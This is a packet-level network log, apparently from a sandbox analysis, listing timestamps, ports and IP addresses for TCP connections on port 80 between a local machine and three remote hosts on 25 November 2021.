Nov 25, 2021 19:26:22.647871971 CET	80	49167	107.173.229.133	192.168.2.22
Nov 25, 2021 19:26:22.647886038 CET	49167	80	192.168.2.22	107.173.229.133
Nov 25, 2021 19:26:22.647910118 CET	80	49167	107.173.229.133	192.168.2.22
Nov 25, 2021 19:26:22.647923946 CET	49167	80	192.168.2.22	107.173.229.133
Nov 25, 2021 19:26:22.647950888 CET	80	49167	107.173.229.133	192.168.2.22
Nov 25, 2021 19:26:22.647969007 CET	49167	80	192.168.2.22	107.173.229.133
Nov 25, 2021 19:26:22.647989988 CET	80	49167	107.173.229.133	192.168.2.22
Nov 25, 2021 19:26:22.647995949 CET	49167	80	192.168.2.22	107.173.229.133
Nov 25, 2021 19:26:22.648029089 CET	80	49167	107.173.229.133	192.168.2.22
Nov 25, 2021 19:26:22.648034096 CET	49167	80	192.168.2.22	107.173.229.133
Nov 25, 2021 19:26:22.648070097 CET	80	49167	107.173.229.133	192.168.2.22
Nov 25, 2021 19:26:22.648073912 CET	49167	80	192.168.2.22	107.173.229.133
Nov 25, 2021 19:26:22.648108006 CET	80	49167	107.173.229.133	192.168.2.22
Nov 25, 2021 19:26:22.648121119 CET	49167	80	192.168.2.22	107.173.229.133
Nov 25, 2021 19:26:22.648148060 CET	80	49167	107.173.229.133	192.168.2.22
Nov 25, 2021 19:26:22.648148060 CET	49167	80	192.168.2.22	107.173.229.133
Nov 25, 2021 19:26:22.648188114 CET	80	49167	107.173.229.133	192.168.2.22
Nov 25, 2021 19:26:22.648191929 CET	49167	80	192.168.2.22	107.173.229.133
Nov 25, 2021 19:26:22.648211002 CET	49167	80	192.168.2.22	107.173.229.133
Nov 25, 2021 19:26:22.648225069 CET	80	49167	107.173.229.133	192.168.2.22
Nov 25, 2021 19:26:22.648231030 CET	49167	80	192.168.2.22	107.173.229.133
Nov 25, 2021 19:26:22.648264885 CET	80	49167	107.173.229.133	192.168.2.22
Nov 25, 2021 19:26:22.648276091 CET	49167	80	192.168.2.22	107.173.229.133
Nov 25, 2021 19:26:22.648303986 CET	80	49167	107.173.229.133	192.168.2.22
Nov 25, 2021 19:26:22.648308992 CET	49167	80	192.168.2.22	107.173.229.133
Nov 25, 2021 19:26:22.648344994 CET	80	49167	107.173.229.133	192.168.2.22
Nov 25, 2021 19:26:22.648349047 CET	49167	80	192.168.2.22	107.173.229.133
Nov 25, 2021 19:26:22.648386955 CET	80	49167	107.173.229.133	192.168.2.22
Nov 25, 2021 19:26:22.648391962 CET	49167	80	192.168.2.22	107.173.229.133
Nov 25, 2021 19:26:22.648427963 CET	80	49167	107.173.229.133	192.168.2.22
Nov 25, 2021 19:26:22.648437023 CET	49167	80	192.168.2.22	107.173.229.133
Nov 25, 2021 19:26:22.648468018 CET	80	49167	107.173.229.133	192.168.2.22
Nov 25, 2021 19:26:22.648475885 CET	49167	80	192.168.2.22	107.173.229.133
Nov 25, 2021 19:26:22.648508072 CET	80	49167	107.173.229.133	192.168.2.22
Nov 25, 2021 19:26:22.648514986 CET	49167	80	192.168.2.22	107.173.229.133
Nov 25, 2021 19:26:22.648545980 CET	80	49167	107.173.229.133	192.168.2.22
Nov 25, 2021 19:26:22.648567915 CET	49167	80	192.168.2.22	107.173.229.133
Nov 25, 2021 19:26:22.648586035 CET	80	49167	107.173.229.133	192.168.2.22
Nov 25, 2021 19:26:22.648598909 CET	49167	80	192.168.2.22	107.173.229.133
Nov 25, 2021 19:26:22.648623943 CET	80	49167	107.173.229.133	192.168.2.22
Nov 25, 2021 19:26:22.648629904 CET	49167	80	192.168.2.22	107.173.229.133
Nov 25, 2021 19:26:22.648663998 CET	80	49167	107.173.229.133	192.168.2.22
Nov 25, 2021 19:26:22.648669004 CET	49167	80	192.168.2.22	107.173.229.133
Nov 25, 2021 19:26:22.648705006 CET	80	49167	107.173.229.133	192.168.2.22
Nov 25, 2021 19:26:22.648706913 CET	49167	80	192.168.2.22	107.173.229.133
Nov 25, 2021 19:26:22.648742914 CET	80	49167	107.173.229.133	192.168.2.22
Nov 25, 2021 19:26:22.648746967 CET	49167	80	192.168.2.22	107.173.229.133
Nov 25, 2021 19:26:22.648782015 CET	80	49167	107.173.229.133	192.168.2.22
Nov 25, 2021 19:26:22.648786068 CET	49167	80	192.168.2.22	107.173.229.133
Nov 25, 2021 19:26:22.648821115 CET	80	49167	107.173.229.133	192.168.2.22
Nov 25, 2021 19:26:22.648822069 CET	49167	80	192.168.2.22	107.173.229.133
Nov 25, 2021 19:26:22.648871899 CET	49167	80	192.168.2.22	107.173.229.133
Nov 25, 2021 19:26:22.649725914 CET	49167	80	192.168.2.22	107.173.229.133
Nov 25, 2021 19:26:22.654484987 CET	80	49167	107.173.229.133	192.168.2.22
Nov 25, 2021 19:26:22.654525995 CET	80	49167	107.173.229.133	192.168.2.22
Nov 25, 2021 19:26:22.654565096 CET	80	49167	107.173.229.133	192.168.2.22
Nov 25, 2021 19:26:22.654602051 CET	80	49167	107.173.229.133	192.168.2.22
Nov 25, 2021 19:26:22.654642105 CET	80	49167	107.173.229.133	192.168.2.22
Nov 25, 2021 19:26:22.654683113 CET	80	49167	107.173.229.133	192.168.2.22
Nov 25, 2021 19:26:22.654721022 CET	80	49167	107.173.229.133	192.168.2.22
Nov 25, 2021 19:26:22.654723883 CET	49167	80	192.168.2.22	107.173.229.133
Nov 25, 2021 19:26:22.654752016 CET	49167	80	192.168.2.22	107.173.229.133
Nov 25, 2021 19:26:22.654757977 CET	49167	80	192.168.2.22	107.173.229.133
Nov 25, 2021 19:26:22.654762983 CET	49167	80	192.168.2.22	107.173.229.133
Nov 25, 2021 19:26:22.654767990 CET	49167	80	192.168.2.22	107.173.229.133
Nov 25, 2021 19:26:22.654772997 CET	49167	80	192.168.2.22	107.173.229.133
Nov 25, 2021 19:26:22.756457090 CET	80	49167	107.173.229.133	192.168.2.22
Nov 25, 2021 19:26:22.756520987 CET	80	49167	107.173.229.133	192.168.2.22
Nov 25, 2021 19:26:22.756563902 CET	80	49167	107.173.229.133	192.168.2.22
Nov 25, 2021 19:26:22.756604910 CET	80	49167	107.173.229.133	192.168.2.22
Nov 25, 2021 19:26:22.756644011 CET	80	49167	107.173.229.133	192.168.2.22
Nov 25, 2021 19:26:22.756678104 CET	49167	80	192.168.2.22	107.173.229.133
Nov 25, 2021 19:26:22.756681919 CET	80	49167	107.173.229.133	192.168.2.22
Nov 25, 2021 19:26:22.756719112 CET	49167	80	192.168.2.22	107.173.229.133
Nov 25, 2021 19:26:22.756726980 CET	80	49167	107.173.229.133	192.168.2.22
Nov 25, 2021 19:26:22.756748915 CET	49167	80	192.168.2.22	107.173.229.133
Nov 25, 2021 19:26:22.756757975 CET	80	49167	107.173.229.133	192.168.2.22
Nov 25, 2021 19:26:22.756792068 CET	49167	80	192.168.2.22	107.173.229.133
Nov 25, 2021 19:26:22.756800890 CET	80	49167	107.173.229.133	192.168.2.22
Nov 25, 2021 19:26:22.756818056 CET	49167	80	192.168.2.22	107.173.229.133
Nov 25, 2021 19:26:22.756841898 CET	80	49167	107.173.229.133	192.168.2.22
Nov 25, 2021 19:26:22.756845951 CET	49167	80	192.168.2.22	107.173.229.133
Nov 25, 2021 19:26:22.756938934 CET	49167	80	192.168.2.22	107.173.229.133
Nov 25, 2021 19:26:22.756941080 CET	80	49167	107.173.229.133	192.168.2.22
Nov 25, 2021 19:26:22.756984949 CET	80	49167	107.173.229.133	192.168.2.22
Nov 25, 2021 19:26:22.757006884 CET	49167	80	192.168.2.22	107.173.229.133
Nov 25, 2021 19:26:22.757024050 CET	80	49167	107.173.229.133	192.168.2.22
Nov 25, 2021 19:26:22.757065058 CET	80	49167	107.173.229.133	192.168.2.22
Nov 25, 2021 19:26:22.757078886 CET	49167	80	192.168.2.22	107.173.229.133
Nov 25, 2021 19:26:22.757088900 CET	49167	80	192.168.2.22	107.173.229.133
Nov 25, 2021 19:26:22.757105112 CET	80	49167	107.173.229.133	192.168.2.22
Nov 25, 2021 19:26:22.757113934 CET	49167	80	192.168.2.22	107.173.229.133
Nov 25, 2021 19:26:22.757144928 CET	80	49167	107.173.229.133	192.168.2.22
Nov 25, 2021 19:26:22.757189989 CET	49167	80	192.168.2.22	107.173.229.133
Nov 25, 2021 19:26:22.757200003 CET	49167	80	192.168.2.22	107.173.229.133
Nov 25, 2021 19:26:22.762211084 CET	80	49167	107.173.229.133	192.168.2.22
Nov 25, 2021 19:26:22.762269020 CET	80	49167	107.173.229.133	192.168.2.22
Nov 25, 2021 19:26:22.762306929 CET	80	49167	107.173.229.133	192.168.2.22
Nov 25, 2021 19:26:22.762345076 CET	49167	80	192.168.2.22	107.173.229.133
Nov 25, 2021 19:26:22.762346029 CET	80	49167	107.173.229.133	192.168.2.22
Nov 25, 2021 19:26:22.762362957 CET	49167	80	192.168.2.22	107.173.229.133
Nov 25, 2021 19:26:22.762387037 CET	80	49167	107.173.229.133	192.168.2.22
Nov 25, 2021 19:26:22.762388945 CET	49167	80	192.168.2.22	107.173.229.133
Nov 25, 2021 19:26:22.762430906 CET	80	49167	107.173.229.133	192.168.2.22
Nov 25, 2021 19:26:22.762432098 CET	49167	80	192.168.2.22	107.173.229.133
Nov 25, 2021 19:26:22.762458086 CET	49167	80	192.168.2.22	107.173.229.133
Nov 25, 2021 19:26:22.762475967 CET	80	49167	107.173.229.133	192.168.2.22
Nov 25, 2021 19:26:22.762492895 CET	49167	80	192.168.2.22	107.173.229.133
Nov 25, 2021 19:26:22.762515068 CET	80	49167	107.173.229.133	192.168.2.22
Nov 25, 2021 19:26:22.762548923 CET	49167	80	192.168.2.22	107.173.229.133
Nov 25, 2021 19:26:22.762553930 CET	80	49167	107.173.229.133	192.168.2.22
Nov 25, 2021 19:26:22.762573004 CET	49167	80	192.168.2.22	107.173.229.133
Nov 25, 2021 19:26:22.762593985 CET	80	49167	107.173.229.133	192.168.2.22
Nov 25, 2021 19:26:22.762614012 CET	49167	80	192.168.2.22	107.173.229.133
Nov 25, 2021 19:26:22.762633085 CET	80	49167	107.173.229.133	192.168.2.22
Nov 25, 2021 19:26:22.762670994 CET	80	49167	107.173.229.133	192.168.2.22
Nov 25, 2021 19:26:22.762698889 CET	49167	80	192.168.2.22	107.173.229.133
Nov 25, 2021 19:26:22.762711048 CET	80	49167	107.173.229.133	192.168.2.22
Nov 25, 2021 19:26:22.762712002 CET	49167	80	192.168.2.22	107.173.229.133
Nov 25, 2021 19:26:22.762721062 CET	49167	80	192.168.2.22	107.173.229.133
Nov 25, 2021 19:26:22.762753010 CET	80	49167	107.173.229.133	192.168.2.22
Nov 25, 2021 19:26:22.762767076 CET	49167	80	192.168.2.22	107.173.229.133
Nov 25, 2021 19:26:22.762794971 CET	80	49167	107.173.229.133	192.168.2.22
Nov 25, 2021 19:26:22.762814045 CET	49167	80	192.168.2.22	107.173.229.133
Nov 25, 2021 19:26:22.762834072 CET	80	49167	107.173.229.133	192.168.2.22
Nov 25, 2021 19:26:22.762866020 CET	49167	80	192.168.2.22	107.173.229.133
Nov 25, 2021 19:26:22.762875080 CET	80	49167	107.173.229.133	192.168.2.22
Nov 25, 2021 19:26:22.762891054 CET	49167	80	192.168.2.22	107.173.229.133
Nov 25, 2021 19:26:22.762914896 CET	80	49167	107.173.229.133	192.168.2.22
Nov 25, 2021 19:26:22.762936115 CET	49167	80	192.168.2.22	107.173.229.133
Nov 25, 2021 19:26:22.762954950 CET	80	49167	107.173.229.133	192.168.2.22
Nov 25, 2021 19:26:22.762963057 CET	49167	80	192.168.2.22	107.173.229.133
Nov 25, 2021 19:26:22.762995005 CET	80	49167	107.173.229.133	192.168.2.22
Nov 25, 2021 19:26:22.763010979 CET	49167	80	192.168.2.22	107.173.229.133
Nov 25, 2021 19:26:22.763036013 CET	80	49167	107.173.229.133	192.168.2.22
Nov 25, 2021 19:26:22.763041973 CET	49167	80	192.168.2.22	107.173.229.133
Nov 25, 2021 19:26:22.763077021 CET	80	49167	107.173.229.133	192.168.2.22
Nov 25, 2021 19:26:22.763104916 CET	49167	80	192.168.2.22	107.173.229.133
Nov 25, 2021 19:26:22.763118029 CET	80	49167	107.173.229.133	192.168.2.22
Nov 25, 2021 19:26:22.763140917 CET	49167	80	192.168.2.22	107.173.229.133
Nov 25, 2021 19:26:22.763156891 CET	80	49167	107.173.229.133	192.168.2.22
Nov 25, 2021 19:26:22.763174057 CET	49167	80	192.168.2.22	107.173.229.133
Nov 25, 2021 19:26:22.763199091 CET	80	49167	107.173.229.133	192.168.2.22
Nov 25, 2021 19:26:22.763200998 CET	49167	80	192.168.2.22	107.173.229.133
Nov 25, 2021 19:26:22.763237953 CET	80	49167	107.173.229.133	192.168.2.22
Nov 25, 2021 19:26:22.763264894 CET	49167	80	192.168.2.22	107.173.229.133
Nov 25, 2021 19:26:22.763273954 CET	80	49167	107.173.229.133	192.168.2.22
Nov 25, 2021 19:26:22.763283968 CET	49167	80	192.168.2.22	107.173.229.133
Nov 25, 2021 19:26:22.763314009 CET	80	49167	107.173.229.133	192.168.2.22
Nov 25, 2021 19:26:22.763339996 CET	49167	80	192.168.2.22	107.173.229.133
Nov 25, 2021 19:26:22.763353109 CET	80	49167	107.173.229.133	192.168.2.22
Nov 25, 2021 19:26:22.763371944 CET	49167	80	192.168.2.22	107.173.229.133
Nov 25, 2021 19:26:22.763394117 CET	80	49167	107.173.229.133	192.168.2.22
Nov 25, 2021 19:26:22.763412952 CET	49167	80	192.168.2.22	107.173.229.133
Nov 25, 2021 19:26:22.763437033 CET	80	49167	107.173.229.133	192.168.2.22
Nov 25, 2021 19:26:22.763457060 CET	49167	80	192.168.2.22	107.173.229.133
Nov 25, 2021 19:26:22.763477087 CET	80	49167	107.173.229.133	192.168.2.22
Nov 25, 2021 19:26:22.763497114 CET	49167	80	192.168.2.22	107.173.229.133
Nov 25, 2021 19:26:22.763515949 CET	80	49167	107.173.229.133	192.168.2.22
Nov 25, 2021 19:26:22.763545990 CET	80	49167	107.173.229.133	192.168.2.22
Nov 25, 2021 19:26:22.763576984 CET	80	49167	107.173.229.133	192.168.2.22
Nov 25, 2021 19:26:22.763609886 CET	49167	80	192.168.2.22	107.173.229.133
Nov 25, 2021 19:26:22.763616085 CET	80	49167	107.173.229.133	192.168.2.22
Nov 25, 2021 19:26:22.763636112 CET	49167	80	192.168.2.22	107.173.229.133
Nov 25, 2021 19:26:22.763654947 CET	80	49167	107.173.229.133	192.168.2.22
Nov 25, 2021 19:26:22.763669968 CET	49167	80	192.168.2.22	107.173.229.133
Nov 25, 2021 19:26:22.763694048 CET	80	49167	107.173.229.133	192.168.2.22
Nov 25, 2021 19:26:22.763715982 CET	49167	80	192.168.2.22	107.173.229.133
Nov 25, 2021 19:26:22.763734102 CET	80	49167	107.173.229.133	192.168.2.22
Nov 25, 2021 19:26:22.763748884 CET	49167	80	192.168.2.22	107.173.229.133
Nov 25, 2021 19:26:22.763772964 CET	80	49167	107.173.229.133	192.168.2.22
Nov 25, 2021 19:26:22.763792038 CET	49167	80	192.168.2.22	107.173.229.133
Nov 25, 2021 19:26:22.763813972 CET	80	49167	107.173.229.133	192.168.2.22
Nov 25, 2021 19:26:22.763828039 CET	49167	80	192.168.2.22	107.173.229.133
Nov 25, 2021 19:26:22.763850927 CET	80	49167	107.173.229.133	192.168.2.22
Nov 25, 2021 19:26:22.763870955 CET	49167	80	192.168.2.22	107.173.229.133
Nov 25, 2021 19:26:22.763890982 CET	80	49167	107.173.229.133	192.168.2.22
Nov 25, 2021 19:26:22.763904095 CET	49167	80	192.168.2.22	107.173.229.133
Nov 25, 2021 19:26:22.763931036 CET	80	49167	107.173.229.133	192.168.2.22
Nov 25, 2021 19:26:22.763943911 CET	49167	80	192.168.2.22	107.173.229.133
Nov 25, 2021 19:26:22.763968945 CET	80	49167	107.173.229.133	192.168.2.22
Nov 25, 2021 19:26:22.763983965 CET	49167	80	192.168.2.22	107.173.229.133
Nov 25, 2021 19:26:22.764008045 CET	80	49167	107.173.229.133	192.168.2.22
Nov 25, 2021 19:26:22.764022112 CET	49167	80	192.168.2.22	107.173.229.133
Nov 25, 2021 19:26:22.764048100 CET	80	49167	107.173.229.133	192.168.2.22
Nov 25, 2021 19:26:22.764061928 CET	49167	80	192.168.2.22	107.173.229.133
Nov 25, 2021 19:26:22.764089108 CET	80	49167	107.173.229.133	192.168.2.22
Nov 25, 2021 19:26:22.764098883 CET	49167	80	192.168.2.22	107.173.229.133
Nov 25, 2021 19:26:22.764131069 CET	80	49167	107.173.229.133	192.168.2.22
Nov 25, 2021 19:26:22.764139891 CET	49167	80	192.168.2.22	107.173.229.133
Nov 25, 2021 19:26:22.764168024 CET	80	49167	107.173.229.133	192.168.2.22
Nov 25, 2021 19:26:22.764183044 CET	49167	80	192.168.2.22	107.173.229.133
Nov 25, 2021 19:26:22.764208078 CET	80	49167	107.173.229.133	192.168.2.22
Nov 25, 2021 19:26:22.764221907 CET	49167	80	192.168.2.22	107.173.229.133
Nov 25, 2021 19:26:22.764247894 CET	80	49167	107.173.229.133	192.168.2.22
Nov 25, 2021 19:26:22.764261007 CET	49167	80	192.168.2.22	107.173.229.133
Nov 25, 2021 19:26:22.764286041 CET	80	49167	107.173.229.133	192.168.2.22
Nov 25, 2021 19:26:22.764297962 CET	49167	80	192.168.2.22	107.173.229.133
Nov 25, 2021 19:26:22.764324903 CET	80	49167	107.173.229.133	192.168.2.22
Nov 25, 2021 19:26:22.764338017 CET	49167	80	192.168.2.22	107.173.229.133
Nov 25, 2021 19:26:22.764364958 CET	80	49167	107.173.229.133	192.168.2.22
Nov 25, 2021 19:26:22.764374018 CET	49167	80	192.168.2.22	107.173.229.133
Nov 25, 2021 19:26:22.764415979 CET	80	49167	107.173.229.133	192.168.2.22
Nov 25, 2021 19:26:22.764422894 CET	49167	80	192.168.2.22	107.173.229.133
Nov 25, 2021 19:26:22.764456034 CET	80	49167	107.173.229.133	192.168.2.22
Nov 25, 2021 19:26:22.764492035 CET	80	49167	107.173.229.133	192.168.2.22
Nov 25, 2021 19:26:22.764496088 CET	49167	80	192.168.2.22	107.173.229.133
Nov 25, 2021 19:26:22.764508963 CET	49167	80	192.168.2.22	107.173.229.133
Nov 25, 2021 19:26:22.764530897 CET	80	49167	107.173.229.133	192.168.2.22
Nov 25, 2021 19:26:22.764534950 CET	49167	80	192.168.2.22	107.173.229.133
Nov 25, 2021 19:26:22.764570951 CET	80	49167	107.173.229.133	192.168.2.22
Nov 25, 2021 19:26:22.764585972 CET	49167	80	192.168.2.22	107.173.229.133
Nov 25, 2021 19:26:22.764610052 CET	80	49167	107.173.229.133	192.168.2.22
Nov 25, 2021 19:26:22.764622927 CET	49167	80	192.168.2.22	107.173.229.133
Nov 25, 2021 19:26:22.764650106 CET	80	49167	107.173.229.133	192.168.2.22
Nov 25, 2021 19:26:22.764662027 CET	49167	80	192.168.2.22	107.173.229.133
Nov 25, 2021 19:26:22.764689922 CET	80	49167	107.173.229.133	192.168.2.22
Nov 25, 2021 19:26:22.764704943 CET	49167	80	192.168.2.22	107.173.229.133
Nov 25, 2021 19:26:22.764729023 CET	80	49167	107.173.229.133	192.168.2.22
Nov 25, 2021 19:26:22.764750004 CET	49167	80	192.168.2.22	107.173.229.133
Nov 25, 2021 19:26:22.764767885 CET	80	49167	107.173.229.133	192.168.2.22
Nov 25, 2021 19:26:22.764786005 CET	49167	80	192.168.2.22	107.173.229.133
Nov 25, 2021 19:26:22.764810085 CET	80	49167	107.173.229.133	192.168.2.22
Nov 25, 2021 19:26:22.764828920 CET	49167	80	192.168.2.22	107.173.229.133
Nov 25, 2021 19:26:22.764864922 CET	49167	80	192.168.2.22	107.173.229.133
Nov 25, 2021 19:26:22.765701056 CET	49167	80	192.168.2.22	107.173.229.133
Nov 25, 2021 19:26:22.768104076 CET	80	49167	107.173.229.133	192.168.2.22
Nov 25, 2021 19:26:22.768158913 CET	80	49167	107.173.229.133	192.168.2.22
Nov 25, 2021 19:26:22.768198967 CET	80	49167	107.173.229.133	192.168.2.22
Nov 25, 2021 19:26:22.768214941 CET	49167	80	192.168.2.22	107.173.229.133
Nov 25, 2021 19:26:22.768229008 CET	49167	80	192.168.2.22	107.173.229.133
Nov 25, 2021 19:26:22.768241882 CET	80	49167	107.173.229.133	192.168.2.22
Nov 25, 2021 19:26:22.768244028 CET	49167	80	192.168.2.22	107.173.229.133
Nov 25, 2021 19:26:22.768280983 CET	80	49167	107.173.229.133	192.168.2.22
Nov 25, 2021 19:26:22.768304110 CET	49167	80	192.168.2.22	107.173.229.133
Nov 25, 2021 19:26:22.768316031 CET	49167	80	192.168.2.22	107.173.229.133
Nov 25, 2021 19:26:22.768320084 CET	80	49167	107.173.229.133	192.168.2.22
Nov 25, 2021 19:26:22.768358946 CET	80	49167	107.173.229.133	192.168.2.22
Nov 25, 2021 19:26:22.768372059 CET	49167	80	192.168.2.22	107.173.229.133
Nov 25, 2021 19:26:22.768399954 CET	80	49167	107.173.229.133	192.168.2.22
Nov 25, 2021 19:26:22.768409967 CET	49167	80	192.168.2.22	107.173.229.133
Nov 25, 2021 19:26:22.768444061 CET	80	49167	107.173.229.133	192.168.2.22
Nov 25, 2021 19:26:22.768451929 CET	49167	80	192.168.2.22	107.173.229.133
Nov 25, 2021 19:26:22.768482924 CET	80	49167	107.173.229.133	192.168.2.22
Nov 25, 2021 19:26:22.768496990 CET	49167	80	192.168.2.22	107.173.229.133
Nov 25, 2021 19:26:22.768522978 CET	80	49167	107.173.229.133	192.168.2.22
Nov 25, 2021 19:26:22.768538952 CET	49167	80	192.168.2.22	107.173.229.133
Nov 25, 2021 19:26:22.768564939 CET	80	49167	107.173.229.133	192.168.2.22
Nov 25, 2021 19:26:22.768579006 CET	49167	80	192.168.2.22	107.173.229.133
Nov 25, 2021 19:26:22.768604040 CET	80	49167	107.173.229.133	192.168.2.22
Nov 25, 2021 19:26:22.768618107 CET	49167	80	192.168.2.22	107.173.229.133
Nov 25, 2021 19:26:22.768646955 CET	80	49167	107.173.229.133	192.168.2.22
Nov 25, 2021 19:26:22.768654108 CET	49167	80	192.168.2.22	107.173.229.133
Nov 25, 2021 19:26:22.768699884 CET	49167	80	192.168.2.22	107.173.229.133
Nov 25, 2021 19:26:22.774843931 CET	49167	80	192.168.2.22	107.173.229.133
Nov 25, 2021 19:26:22.775506020 CET	49167	80	192.168.2.22	107.173.229.133
Nov 25, 2021 19:26:22.870857954 CET	80	49167	107.173.229.133	192.168.2.22
Nov 25, 2021 19:26:22.870922089 CET	80	49167	107.173.229.133	192.168.2.22
Nov 25, 2021 19:26:22.870959997 CET	80	49167	107.173.229.133	192.168.2.22
Nov 25, 2021 19:26:22.870997906 CET	80	49167	107.173.229.133	192.168.2.22
Nov 25, 2021 19:26:22.871036053 CET	80	49167	107.173.229.133	192.168.2.22
Nov 25, 2021 19:26:22.871074915 CET	80	49167	107.173.229.133	192.168.2.22
Nov 25, 2021 19:26:22.871100903 CET	49167	80	192.168.2.22	107.173.229.133
Nov 25, 2021 19:26:22.871117115 CET	80	49167	107.173.229.133	192.168.2.22
Nov 25, 2021 19:26:22.871141911 CET	49167	80	192.168.2.22	107.173.229.133
Nov 25, 2021 19:26:22.871149063 CET	80	49167	107.173.229.133	192.168.2.22
Nov 25, 2021 19:26:22.871184111 CET	49167	80	192.168.2.22	107.173.229.133
Nov 25, 2021 19:26:22.871189117 CET	80	49167	107.173.229.133	192.168.2.22
Nov 25, 2021 19:26:22.871205091 CET	49167	80	192.168.2.22	107.173.229.133
Nov 25, 2021 19:26:22.871231079 CET	80	49167	107.173.229.133	192.168.2.22
Nov 25, 2021 19:26:22.871244907 CET	49167	80	192.168.2.22	107.173.229.133
Nov 25, 2021 19:26:22.871272087 CET	80	49167	107.173.229.133	192.168.2.22
Nov 25, 2021 19:26:22.871274948 CET	49167	80	192.168.2.22	107.173.229.133
Nov 25, 2021 19:26:22.871315956 CET	80	49167	107.173.229.133	192.168.2.22
Nov 25, 2021 19:26:22.871339083 CET	49167	80	192.168.2.22	107.173.229.133
Nov 25, 2021 19:26:22.871354103 CET	80	49167	107.173.229.133	192.168.2.22
Nov 25, 2021 19:26:22.871366978 CET	49167	80	192.168.2.22	107.173.229.133
Nov 25, 2021 19:26:22.871393919 CET	80	49167	107.173.229.133	192.168.2.22
Nov 25, 2021 19:26:22.871412992 CET	49167	80	192.168.2.22	107.173.229.133
Nov 25, 2021 19:26:22.871436119 CET	80	49167	107.173.229.133	192.168.2.22
Nov 25, 2021 19:26:22.871449947 CET	49167	80	192.168.2.22	107.173.229.133
Nov 25, 2021 19:26:22.871474981 CET	80	49167	107.173.229.133	192.168.2.22
Nov 25, 2021 19:26:22.871501923 CET	49167	80	192.168.2.22	107.173.229.133
Nov 25, 2021 19:26:22.871514082 CET	80	49167	107.173.229.133	192.168.2.22
Nov 25, 2021 19:26:22.871537924 CET	49167	80	192.168.2.22	107.173.229.133
Nov 25, 2021 19:26:22.871551991 CET	49167	80	192.168.2.22	107.173.229.133
Nov 25, 2021 19:26:22.871557951 CET	80	49167	107.173.229.133	192.168.2.22
Nov 25, 2021 19:26:22.871598005 CET	80	49167	107.173.229.133	192.168.2.22
Nov 25, 2021 19:26:22.871625900 CET	49167	80	192.168.2.22	107.173.229.133
Nov 25, 2021 19:26:22.871638060 CET	80	49167	107.173.229.133	192.168.2.22
Nov 25, 2021 19:26:22.871654987 CET	49167	80	192.168.2.22	107.173.229.133
Nov 25, 2021 19:26:22.871675968 CET	80	49167	107.173.229.133	192.168.2.22
Nov 25, 2021 19:26:22.871701956 CET	49167	80	192.168.2.22	107.173.229.133
Nov 25, 2021 19:26:22.871716022 CET	80	49167	107.173.229.133	192.168.2.22
Nov 25, 2021 19:26:22.871731043 CET	49167	80	192.168.2.22	107.173.229.133
Nov 25, 2021 19:26:22.871757984 CET	80	49167	107.173.229.133	192.168.2.22
Nov 25, 2021 19:26:22.871778011 CET	49167	80	192.168.2.22	107.173.229.133
Nov 25, 2021 19:26:22.871794939 CET	80	49167	107.173.229.133	192.168.2.22
Nov 25, 2021 19:26:22.871819973 CET	49167	80	192.168.2.22	107.173.229.133
Nov 25, 2021 19:26:22.871834040 CET	80	49167	107.173.229.133	192.168.2.22
Nov 25, 2021 19:26:22.871846914 CET	49167	80	192.168.2.22	107.173.229.133
Nov 25, 2021 19:26:22.871872902 CET	80	49167	107.173.229.133	192.168.2.22
Nov 25, 2021 19:26:22.871896982 CET	49167	80	192.168.2.22	107.173.229.133
Nov 25, 2021 19:26:22.871912956 CET	80	49167	107.173.229.133	192.168.2.22
Nov 25, 2021 19:26:22.871927977 CET	49167	80	192.168.2.22	107.173.229.133
Nov 25, 2021 19:26:22.871953964 CET	80	49167	107.173.229.133	192.168.2.22
Nov 25, 2021 19:26:22.871984959 CET	49167	80	192.168.2.22	107.173.229.133
Nov 25, 2021 19:26:22.871993065 CET	80	49167	107.173.229.133	192.168.2.22
Nov 25, 2021 19:26:22.872004986 CET	49167	80	192.168.2.22	107.173.229.133
Nov 25, 2021 19:26:22.872033119 CET	80	49167	107.173.229.133	192.168.2.22
Nov 25, 2021 19:26:22.872037888 CET	49167	80	192.168.2.22	107.173.229.133
Nov 25, 2021 19:26:22.872073889 CET	80	49167	107.173.229.133	192.168.2.22
Nov 25, 2021 19:26:22.872097015 CET	49167	80	192.168.2.22	107.173.229.133
Nov 25, 2021 19:26:22.872112989 CET	80	49167	107.173.229.133	192.168.2.22
Nov 25, 2021 19:26:22.872126102 CET	49167	80	192.168.2.22	107.173.229.133
Nov 25, 2021 19:26:22.872147083 CET	80	49167	107.173.229.133	192.168.2.22
Nov 25, 2021 19:26:22.872174025 CET	49167	80	192.168.2.22	107.173.229.133
Nov 25, 2021 19:26:22.872204065 CET	49167	80	192.168.2.22	107.173.229.133
Nov 25, 2021 19:26:22.873308897 CET	49167	80	192.168.2.22	107.173.229.133
Nov 25, 2021 19:26:23.785650015 CET	49167	80	192.168.2.22	107.173.229.133
Nov 25, 2021 19:27:31.238317013 CET	49168	80	192.168.2.22	192.0.78.25
Nov 25, 2021 19:27:31.255286932 CET	80	49168	192.0.78.25	192.168.2.22
Nov 25, 2021 19:27:31.255466938 CET	49168	80	192.168.2.22	192.0.78.25
Nov 25, 2021 19:27:31.255728006 CET	49168	80	192.168.2.22	192.0.78.25
Nov 25, 2021 19:27:31.272515059 CET	80	49168	192.0.78.25	192.168.2.22
Nov 25, 2021 19:27:31.272551060 CET	80	49168	192.0.78.25	192.168.2.22
Nov 25, 2021 19:27:31.272578001 CET	80	49168	192.0.78.25	192.168.2.22
Nov 25, 2021 19:27:31.272804976 CET	49168	80	192.168.2.22	192.0.78.25
Nov 25, 2021 19:27:31.272939920 CET	49168	80	192.168.2.22	192.0.78.25
Nov 25, 2021 19:27:31.289624929 CET	80	49168	192.0.78.25	192.168.2.22
Nov 25, 2021 19:27:36.618729115 CET	49169	80	192.168.2.22	151.106.119.46
Nov 25, 2021 19:27:36.860469103 CET	80	49169	151.106.119.46	192.168.2.22
Nov 25, 2021 19:27:36.860716105 CET	49169	80	192.168.2.22	151.106.119.46
Nov 25, 2021 19:27:36.861370087 CET	49169	80	192.168.2.22	151.106.119.46
Nov 25, 2021 19:27:37.103061914 CET	80	49169	151.106.119.46	192.168.2.22
Nov 25, 2021 19:27:37.103225946 CET	80	49169	151.106.119.46	192.168.2.22
Nov 25, 2021 19:27:37.103256941 CET	80	49169	151.106.119.46	192.168.2.22
Nov 25, 2021 19:27:37.103519917 CET	49169	80	192.168.2.22	151.106.119.46
Nov 25, 2021 19:27:37.103643894 CET	49169	80	192.168.2.22	151.106.119.46
Nov 25, 2021 19:27:37.345319986 CET	80	49169	151.106.119.46	192.168.2.22
